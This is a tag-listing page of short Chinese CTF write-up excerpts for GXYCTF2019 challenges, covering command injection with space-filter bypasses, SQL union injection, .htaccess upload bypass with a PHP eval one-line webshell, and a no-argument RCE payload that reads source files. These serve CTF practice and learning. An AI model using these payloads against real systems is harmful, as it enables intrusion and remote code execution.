首页 > TAG信息列表 > GXYCTF2019

re | [GXYCTF2019]minecraft

[GXYCTF2019]minecraft 闲得无聊,找个题练练手。 提示是使用了boost库的hash,给了exe和dll,都是64位的,dll导出了一个函数,就是加密和对比用的。 基本格局如下: 主函数: dll: dll里头说白了感觉就是一个hash,这个hash是先将输入转化为base64的字符串,然后4个一组,放进去做hash,因此输入值

[GXYCTF2019]禁止套娃 wp(没写完)

这道题的思路是使用githack工具扫描目标ip/.git,得到index.php,进行代码审计,得到flag   git源码泄露的原因: 开发人员在开发时,常常会先把源码提交到远程托管网站(如github),最后再从远程托管网站把源码pull到服务器的web目录下,如果忘记把.git文件删除,就造成此漏洞。利用.git文件恢复处

[GXYCTF2019]BabySQli-1

  1、打开之后就是登录界面,随便输入注入语句进行测试,得到如下信息:          2、对注释信息采用base32进行解密,获得base64加密的信息,然后在进行解密,获得结果如下:         3、获得sql语句提示,在1测试时发现很多sql语句被过滤,因此这里采用1' union select 1,2,3#进行

[GXYCTF2019]BabysqliV3.0

打开题目是登录界面 尝试sql注入,发现不行 使用burp爆破出密码是password登录    看了一下url,怀疑存在文件包含    解码得到源码 home.php <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</titl

[GXYCTF2019]StrongestMind

   很明显是一个简单的数学脚本题目 from requests import * import time import re url = "http://1ed9ddb7-1839-4970-84e4-3696cb593a2b.node4.buuoj.cn:81/" s=session() kk = re.compile(r'\d+ [-|+] \d+') r=s.get(url) for i in range(1001): zz=kk

[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping 首先简单测试一下题目 0x00 首先打开题目环境 界面上只有/?ip= 感觉和之前做过的一道ping的题目十分相像 0x01 首先随便ping一下 0x02 有正常的回显 然后试一下ls http://7ee88f12-0ce0-4ffa-92ed-c77d51f1e289.node3.buuoj.cn/?ip=127.0.01;ls 0x0

[GXYCTF2019]禁止套娃

  git源码泄露,用git hack拿下源码 <?php include "flag.php"; echo "flag在哪里呢? "; if(isset($GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $GET['exp'])) { if(';&#

[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping 进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令 发现flag.php可惜不能直接cat flag.php估计绊掉了,那我们cat index.php看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了 ?ip=127.0.0.1;cat$IFS$9index

[GXYCTF2019]BabyUpload

笔记: .htaccess是什么 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来

[GXYCTF2019]BabyUpload

CTF小白试图写一些细到极致的wp来给健忘的自己看_(:з」∠)_ 看到上传文件就刨出了一句话木马: <script language="php">eval($_POST['a']);</script> 顺便绕过了<?过滤,歪打正着了属于是 然后发现文件后缀名还过滤了ph,改成png啥的都ok 直接上传显示文件类型太露骨,在Burp Suite里面

BUUCTF [GXYCTF2019]minecraft

1.拿到文件,一共有exe文件和dll文件、lib文件三个文件 dll文件和lib文件不知道有什么用,所以先IDA打开exe文件: 里面有一个关键的函数String_to_long,对应的加密过程是在动态链接库里,所以我们用IDA打开dll文件,找到String_to_long这个函数: 第64行有一个"-------Checking-----",我们

[GXYCTF2019]Ping Ping Ping

观察页面 看到页面上没有什么输入点,只有一个/?Ip,题目又是ping,可能是ping地址,尝试把页面上的格式输入,再随便写一个地址,如/?ip=210.0.0.1     这与cmd中ping测试相似,但是真的ping是ping不通的,搜ip是有的,应该是一个开了禁ping的,方向应该是正确的。而且应该是假ping。      

[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping 多命令顺序执行 linux空格过滤、字符过滤 1.根据提示,传入/?ip=127.0.0.1,发现有回显,所以传入/?ip=127.0.0.1|ls(|就是按位或,是一种管道符,直接执行|后面的语句)(ls命令可以展示目录),发现两个.php文件 2.想要获取flag.php,但是cat flag和{cat,flag}都

[GXYCTF2019]禁止套娃 WP

知识点 目录扫描 关键字绕过 无参RCE 做题经过 看到题目一脸懵,只有一句话:flag在哪里呢?,随便输入flag.php发现没有404,说明flag就在当前目录下,然后就没思路啦。看WP发现要进行目录扫描,使用dirsearch进行目录扫描,由于出现大量429,所以加上-s 2(这个数字视情况可大可小),扫描出git目录,存

[GXYCTF2019]Ping Ping Ping

打开网站 测试漏洞:RCE 使用ls获得flag.php 使用cat flag.php 空格被过滤 绕过空格过滤 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt 绕过字符过滤 使用字符拼接

[GXYCTF2019]BabysqliV3.0题解

[GXYCTF2019]BabysqliV3.0 常规分析 题目叫babysqli,刚访问的时候会有一个登录页面,于是我用测了测sql注入,毫无收获。 最后发现是弱口令,账号admin,密码password。 登录进去以后是这样的: url末尾是file=的形式,怀疑是文件包含,并且自动在xxx后面加.php。 将file=后面的参数改为php://fi

buuctf:[GXYCTF2019]BabySQli

打开链接   只给了个登录界面 先简单测试一下 username输入admin时,会显示wrong pass   输入其他会显示wrong user     然后查看源代码,发现了一串字符。      经过base32和base64解码得到sql语句    用Order by来查询有几列         证明有3列 利用联合查询临

[GXYCTF2019]禁止套娃 1

1.发现 1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。    2.步骤 2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。 ?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));      3.借鉴 (36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE

[GXYCTF2019]BabyUpload 1

1.发现 1.1打开题目地址发现为文件上传。一步步开始,先上传1.PHP文件,提示有黑名单后缀限制。  1.2上传2.jpg文件,上传成功。想到可以上传.htaccess文件进行黑名单绕过。   2.步骤 2.1上传图片马3.jpg,提示有对文件内容的限制。        2.2更改图片内容上传上传成功。    

[GXYCTF2019]禁止套娃

    查看源代码、network,什么都没有 直接输入/.git/时返回403,输入/.git/head可以下载文件,发现git泄漏 使用GitHack下载源码 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/

[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload 1,先上传个php文件试试,提示后缀名不能有ph 2,上传个.htaccess文件试试,提示上传类型也太露骨了吧 .hatccess文件内容: SetHandler application/x-httpd-php 3,换个文件类型,换成image/jpeg,上传成功! 接下来只需要上传一个带有一句话木马的png/jpg文件就

[GXYCTF2019]BabySQli

先查看f12找到一个目录,进去之后继续f12有一段base32,继续base64解码得到 select * from user where username = '$name' 所以也就知道后台检测是账户和密码分开的,先检查是否存在指定的账户,然后把该账户的所有信息都查询出来,再和输入的密码进行比较。 密码比较这个过程,很有可能是md5

[GXYCTF2019]BabyUpload

这题我先上传了一个正常的图片,一直传不上。奇了怪了,原来是对图片大小还有限制。 传个空的jpg文件上传成功。 上传php2, php3, php4, php5, phps, pht, phtm, phtml后缀也都爆出ph的检查。 上传.htaccess文件修改content-type为image/jpeg可绕过检查。 内容为 SetHandler applicat

buuctf-misc-[GXYCTF2019]gakki

下载文件,是一张妹纸图片 使用foremost,分离拿到一个rar 文件,一般没提示都是暴力破解 密码8864 解压…然后就直接不会了 看大佬文章这是要字频统计,大量无特征、无规律字符。 先上大佬的脚本 alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ12345678

buuctf刷题记录[GXYCTF2019]BabyUpload

目录 一、题目内容二、解题步骤 一、题目内容 文件上传 由于本博客主要是写给自己看的,可能步骤比较简略 二、解题步骤 本题比较简单 上传两个文件 格式如图 用蚁剑链接,在根目录下找到到flag